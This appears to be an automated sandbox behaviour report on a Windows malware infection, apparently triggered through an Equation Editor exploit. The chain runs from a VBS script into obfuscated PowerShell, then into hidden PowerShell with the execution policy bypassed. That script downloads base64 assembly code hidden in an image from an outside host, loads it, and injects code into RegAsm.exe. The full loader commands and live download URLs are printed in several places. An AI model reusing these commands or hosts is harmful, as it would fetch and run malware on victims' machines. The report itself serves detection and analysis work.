11_2_00412077

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434B47 SetUnhandledExceptionFilter,	11_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00434FDC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

11_2_004120F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00419627 mouse_event,

11_2_00419627

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cmr/77662/62.412.012.291//:ptth' , '1' , 'c:\programdata\' , 'rmcd','regasm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cmr/77662/62.412.012.291//:ptth' , '1' , 'c:\programdata\' , 'rmcd','regasm',''))} }"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00434C52 cpuid

11_2_00434C52

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	11_2_0040F8D1
